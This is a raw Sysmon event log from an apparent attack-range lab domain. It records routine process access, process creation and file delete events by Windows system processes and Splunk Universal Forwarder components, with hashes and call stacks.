08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.688{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20AB3C1B72E4C1E6988DF608B7D542D8,SHA256=B3FA609B0379749BDD0E3A5ABCD0E8AC6961AEE6F2E5DC58BC78E9F1E14714D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:53.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.082{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:54.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0103E0AFA3C0EDB6D1A61A74B6F7874,SHA256=7F07A6C8C557901C5AC5E2929CCD3C086D871005287B9E41F571F1BA919BD2DB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB97CBC11156972245D3F4F1A5A1390,SHA256=05C19B746FC41D6136218001CD8372DDC454AB2B3B956ACC889287B27C4B364E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.379{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.095{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6AA9351CC0F18E5F0EAC9FC88D5ECD7,SHA256=E678A7454D72CF1B3C723CC754865108F9518A5CE9AAB7405A7FA592C72B21CC,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001055451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.006{466BC892-F8D1-60EB-0E7E-00000000CF01}43764804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:55.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D6CAE06EA0D85752652F5504B53C951,SHA256=808CD096EC6A62977077889EF5B8F44E0128B19916EA7A6EFE74E2F7C3194684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:55.382{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A195BE95934AFB6370BB6DEA09A62D2E,SHA256=83416A11A63C1BDFCA74328036C4F3F31AFD732A65157A452D76D9B7F15685BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:56.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
